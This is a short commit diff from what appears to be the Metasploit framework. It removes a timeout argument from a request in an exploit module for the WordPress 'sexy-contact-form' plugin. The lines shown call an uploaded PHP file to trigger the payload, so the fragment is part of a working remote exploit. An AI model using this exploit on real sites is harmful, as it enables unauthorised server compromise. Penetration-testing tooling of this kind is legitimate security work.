Removed timeout 2.

bug/bundler_fix
Roberto Soares 2015-04-16 04:48:00 -03:00
parent e6e9c173e3
commit aeb0484889
1 changed files with 2 additions and 2 deletions

View File

@ -69,8 +69,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
print_status("#{peer} - Calling payload...")
send_request_cgi({
send_request_cgi(
'uri' => normalize_uri(wordpress_url_plugins, 'sexy-contact-form', 'includes', 'fileupload', 'files', php_pagename)
}, 2)
)
end
end